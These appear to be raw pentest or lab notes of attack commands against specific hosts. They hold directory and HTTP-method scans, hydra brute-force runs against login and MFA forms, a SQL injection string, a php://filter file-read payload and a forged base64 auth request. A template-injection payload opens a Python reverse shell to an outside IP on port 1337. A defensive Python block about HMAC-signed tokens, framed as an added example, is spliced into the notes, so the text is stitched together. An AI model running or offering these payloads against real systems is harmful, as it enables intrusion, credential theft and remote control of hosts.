random notes

some random notes and cmds

wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://ozone-energy.bitnet


nmap -sV -p80 ozone-energy.bitnet

wapiti -u http://ozone-energy.bitnet -m all

dirb http://ozone-energy.bitnet /usr/share/wordlists/custom/ozone-wordlist.txt

" or "1"="1

hydra -l wscarlett -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/[LOGINPAGE]:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

hydra -l jschmidt -P /usr/share/wordlists/custom/ozone-wordlist.txt ozone-energy.bitnet http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Username or Password"

{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}

{{5*'5'}}

dirb http://10.102.9.99 /usr/share/wordlists/custom/ozone-wordlist.txt

hydra -l admin -P /usr/share/wordlists/custom/ozone-wordlist.txt 10.102.9.99 http-form-post "/login:username=^USER^&password=^PASS^&Login=Login:Invalid Password"

{{ for x in ().class.base.subclasses() %}

{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.102.7.0\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{% endfor }}

php://filter/convert.base64-encode/resource=/token.txt

echo 'bGludXhoaW50LmNvbQo=' | base64 --decode

GET /auth?user=YWRtaW4%3D&token=dHJ1ZQ%3D%3D&rememberMe=False HTTP/1.1
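The user and token values in that /auth request are only URL-encoded base64, so they are whatever the client chooses to send. The following is an added example, not part of these notes: it decodes the two parameters from that request line, shows the forgeable check such a server would be doing, and contrasts it with a token the server signs with its own secret and verifies with HMAC (the key, the function names and the "user:mac" token layout are assumptions).

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Request line copied from the notes above (constructed sample input for this example).
REQUEST_LINE = "GET /auth?user=YWRtaW4%3D&token=dHJ1ZQ%3D%3D&rememberMe=False HTTP/1.1"


def decode_weak_params(request_line: str) -> dict:
    """Decode the base64 user/token query values: they are plain strings anyone can mint."""
    target = request_line.split(" ")[1]
    qs = parse_qs(urlparse(target).query)  # parse_qs also undoes the %3D URL-encoding
    return {k: base64.b64decode(v[0]).decode() for k, v in qs.items() if k in ("user", "token")}


def weak_is_admin(request_line: str) -> bool:
    """Vulnerable check: trusts the decoded values, so user=YWRtaW4= token=dHJ1ZQ== is enough."""
    params = decode_weak_params(request_line)
    return params.get("user") == "admin" and params.get("token") == "true"


# Hardened variant (assumed design): the server signs the username with a secret key and
# only accepts tokens whose MAC it can reproduce itself. The key never leaves the server.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(user: str, key: bytes = SERVER_KEY) -> str:
    """Server side: mint 'user:hmac' and base64 it for transport."""
    mac = hmac.new(key, user.encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{user}:{mac}".encode()).decode()


def verify_token(token: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the username if the MAC verifies, None for anything forged or malformed."""
    try:
        user, mac = base64.urlsafe_b64decode(token).decode().split(":", 1)
    except (ValueError, UnicodeDecodeError):
        return None
    expected = hmac.new(key, user.encode(), hashlib.sha256).hexdigest()
    return user if hmac.compare_digest(mac, expected) else None
```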

hydra -l admin -P /home/kali/generate.txt 10.102.11.237 http-form-post "/prompt:mfa_token=^password&Login=Login:Invalid token, please try again."

hydra -l admin -P /home/kali/Downloads/list3.txt 10.102.11.237 http-form-post "/prompt:username=^USER^&mfa_token=^PASS^&Login=Login:Invalid token, please try again."

i=0
while [ "$i" -le 9999 ]; do
  printf '%04d\n' "$i"
  i=$(( i + 1 ))
done

Look at the host, not just the web app:
identify the web server platform
are there admin portals?
look for dangerous HTTP methods (PUT, COPY, DELETE, TRACE)
are they vulnerable to directory traversal or Shellshock?
use nmap to check ports
